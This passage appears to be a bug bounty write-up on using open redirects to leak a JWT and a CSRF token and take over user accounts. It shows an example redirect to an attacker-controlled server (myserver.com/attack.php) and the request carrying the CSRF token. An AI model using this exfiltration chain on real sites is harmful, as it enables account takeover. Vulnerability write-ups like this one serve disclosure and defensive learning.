You do not need to run 80 reconnaissance tools to get access to user accounts
An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.
CSRF token bug
- There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
- User loads https://example.com/?code=VALUE
x-csrf-tokenset to the CSRF token for the session of the user
GET /verify/VALUE HTTP/1.1 Host: example.com